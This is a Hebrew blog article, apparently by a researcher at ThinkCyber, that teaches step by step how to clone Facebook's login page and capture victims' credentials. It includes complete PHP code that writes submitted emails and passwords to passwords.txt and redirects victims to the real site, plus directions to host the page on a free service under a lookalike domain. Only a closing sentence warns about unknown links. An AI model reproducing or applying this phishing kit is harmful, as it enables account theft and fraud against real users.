Search

עולם אתרי הפישינג

האם תהיתם אי פעם כיצד האקרים יוצרים דפי פישינג?


במאמר זה יוצג התהליך ליצירת דף פישינג לאתר הפופולארי פייסבוק.

אתר פישינג זהו אתר המתחזה לאתר אחר ברשת. אתר זה בדרך כלל מנסה לשלוף מיילים, סיסמאות וכו'. הקורבן נחשף לאתרים מסוג זה בדרך כלל באמצעות הודעות מתחזות בהם הוא מתבקש להזין את הפרטי המייל והסיסמה שלו. על מנת שהקורבן יוכל להזין את הפרטים שלו, התוקף ראשית ייצר גרסה של העמוד אשר אותו הוא רוצה לחקות, לדוגמא דף הכניסה של פייסבוק. דף זה יוכן בשפת צד הלקוח HTML.

לאחר מכן, נצטרך ליצור את צד השרת אשר יקבל את המייל והסיסמה מן הדף, כאשר את החלק הזה נייצר בשפת PHP. לבסוף, יש להעלות את הקבצים שנוצרו לשירות Web-Hosting חינמי תחת השם 000webhost. שירות Web-Hosting זהו שירות המאפשר לאחסן ולפרסם את האתר, כאשר הקובץ המאחסן את הדף הראשי יקרא בדרך כלל index.html.

כעת, ניתן להתחיל עם הקטע הפרקטי של המאמר. ההדגמה מתבצעת באמצעות דפדפן ה-Chrome.

1. ראשית יש להיכנס לדף ההתחברות של פייסבוק באמצעות הדפדפן:

2. על מנת לראות את הקוד של דף ההתחברות יש ללחוץ על שילוב הכפתורים Ctrl + U, פעולה אשר תפתח את העמוד הבא:

3. עמוד זה יכיל את קוד המקור של העמוד, יש להעתיק את קוד זה לתוך עורך קוד כלשהו, לדוגמא Notepad++.

4. חפשו את התגית <form></form> בתוך הקוד המועתק.

תגית\HTML Tag - זהו כל חלק בדף האינטרנט שלכם, כגון: שדות, כפתורים, לינקים וכו'.

על מנת לחפש את התג <form></form> יתבצע שימוש בשילוב הכפתורים הבאים:

יש להשתמש ב-Ctrl + F ולאחר מכן להשתמש ב-Keyword הבא: “<form” (ללא הגרשיים):



5. צריך לשנות את מאפיין ה-Action ל-“server.php”, ואת מאפיין ה-Method נשאיר כ-“post”.


כעת, כל הפרטים שיוזנו בצד הלקוח יעברו לדף צד השרת, server.php, באמצעות פונקציית ה-"POST".

מאפיינים\HTML Attributes – אלה הם המאפיינים של ה-HTML Tags של דפי האינטרנט.

6. שמרו את אותו טקסט לקובץ, ונקרא לו index.html.

7. השרת יכול למשוך את המייל והסיסמה מהשדות של צד הלקוח באמצעות מאפיין בשם id, והקורבן יכול להזין את הסיסמה והמייל אל הדף באמצעות התג <input></input>. לכן, יש לחפש את התג של השדה של המייל בדף הראשי של פייסבוק בכך שאנו נלחץ על שילוב הכפתורים באים: Ctrl + Shift + C.

לאחר מכן יש ללחוץ על שדה המייל:


יצוץ חלון בצד של הדפדפן אשר יציג את הקוד של אותו חלק.


המאפיין type קובע את סוג השדה, כאשר type שווה ל-”password” השדה הוא סיסמה, וכש-type שווה ל-”text” השדה הוא שדה טקסטואלי. ניתן להבין מכך כי אפשרי להשתמש ב-id של השדה (אשר נקרא “email” )על מנת למשוך ממנו מידע מצד השרת.

8. יש לבצע את אותם הפעולות על שדה הסיסמה. לחצו על שילוב הכפתורים הבאים על מנת לדעת מהו ה-id של שדה הסיסמה Ctrl+Shift+C:



מכאן ניתן להבין כי ה-id של שדה הסיסמה הוא “pass”.

9. כעת, כאשר ידוע מאילו שדות למשוך את המידע, ניתן ליצור את צד השרת, server.php:

ראשית יש ליצור קובץ בשם server.php, כאשר כל קוד של PHP מתחילים עם <?php’ ‘. לאחר מכן, יש לוודא כי צד השרת יפתח קובץ שבו הוא ישמור את כל הסיסמאות שהקורבן יקליד, וכמו כן יש לשמור את האובייקט של הקובץ במשתנה. צרו אובייקט של קובץ באמצעות הפונקציה fopen(..,..), המקבלת את שם הקובץ והשיטה שבה הקובץ יפתח:

file_handle = $fopen(“passwords.txt”, “a”);

משתנים -שמירת מידע תתבצע במשתנים שהם אחסון שמאפר שימוש במידע בהמשך הקוד.

פונקציות - אחראיות להתנהגות הקוד. ניתן להריץ פונקציה באמצעות שימוש בשמה והוספת סוגריים לדוגמא function().

קראו לקובץ שבו נשמור את כל הסיסמאות והמיילים passwords.txt. והשיטה שבה יפתח את הקובץ תהיה מסוג Append כיוון שיש צורך להוסיף לקובץ תוכן גם אם יש באותו קובץ תוכן – הצורך נובע מהאפשרות של מצב שבו יהיו

מספר קורבנות, וצד השרת יכתוב אל הקובץ מספר פעמים, כאשר יש עליו כבר תוכן.

שיטות קיימות לפתיחת קבצים:

-השיטה “w” – למטרות כתיבה, אך הוא מוחק את התוכן הקיים לפי הכנסת תוכן חדש.

-השיטה “r” – למטרות קריאה מן הקובץ בלבד.

-השיטה “a” – למטרות הוספה על תוכן שקיים ללא מחיקתו.

- ועוד...

כעת, יש להגדיר כי המייל שהקורבן הזין ייכתב אל תוך הקובץ באמצעות פונקציית ה-fwrite(..,..) אשר מקבלת את התוכן להוספה, ואת האובייקט של הקובץ. צד השרת יקבל את השדה של המייל מהקורבן באמצעות פונקציית ה-POST שתקבל את ה-id של אותו שדה, כאשר ה-id של המייל הוא “email”:

fwrite($file_handle, $_POST[‘email’]);

בכדי להבדיל בין המייל והסיסמה יש להפרידם עם קו הפרדה, לכן נוסיף תו '|' לקובץ או כל תו אחר על מנת להפריד בין הסיסמה לבין המייל. השורה המתאימה לפעולה זו הינה:

fwrite($file_handle, ‘ | ’);

כעת, יש להוסיף אל הקובץ את הסיסמה באופן דומה:

fwrite($file_handle, $_POST[‘pass’]);

כעת יש להגדיר למערכת כי השרת סיים את השימוש עם אותו קובץ באמצעות הפונקצייה fclose(..) שתקבל את אובייקט הקובץ:

fclose($file_handle);

כעת ניתן לגרום לכך הקורבן יועבר לאתר המקורי של פייסבוק לאחר שהקיש את פרטי המייל שלו והסיסמה, לכך אפשרי להשתמש בפונקציית ה- header(..)שתקבל את הכתובת אליה יופנה הקורבן:

header(“Location: http://www.facebook.com”);

לבסוף, כל קוד של PHP צריך להסתיים עם ' ?>'

הקוד של הסופי השרת אמור להיראות כך:

<?php

$file_handle = fopen('passwords.txt', 'a');

fwrite($file_handle, $_POST['email']);

fwrite($file_handle, ' | ');

fwrite($file_handle, $_POST['pass']);

fclose($file_handle);

header('Location: http://www.facebook.com');

?>

כעת יש ליצור את קובץ ה-passwords.txt שבו צד השרת ישמור את כל הסיסמאות והמיילים שהקורבן יזין לדף הפישינג.

10. כעת, העלו את הקבצים שיצרנו לשירות Web-Hosting על מנת שאנשים אחרים יוכלו להיחשף אל דף הפישינג. לצורך ההדגמה ניתן להשתמש בשירות Web-Hosting החינמי 000webhost. הירשמו אל האתר https://www.000webhost.com/free-website-sign-up. כעת יש לבחור שם דומיין ((domain name דומה אל האתר שאנו רוצים לזייף, ולבסוף ניתן להעלות את הקבצים אל השירות:


שם דומיין\Domain name- כל כתובת אינטרנט מכונה גם בשם דומיין Domain name


11. כעת יש לבדוק שההכנה בוצעה נכון ולכן יש להיכנס לאותו domain name ולבחון את האתר. בכדי לבדוק את האתר הכניסו המייל וסיסמה לתוך אתר הפישינג:

אם התהליך בוצע נכון יהיה ניתן לראות את הסיסמה ואת השם משתמש בקובץ passwords.txt בשירות ה-Web Hosting:


ניתן לראות כי התהליך קל ופשוט - וניתן ללמוד ממנו שיעור חשוב. יש להיזהר עם כניסה לכל לינק ממקור לא מוכר.

ליאור מזרחי, מפתח וחוקר בחברת ThinkCyber.


7 views

© 2020 by ThinkCyber

THE 2020

CYBERIUM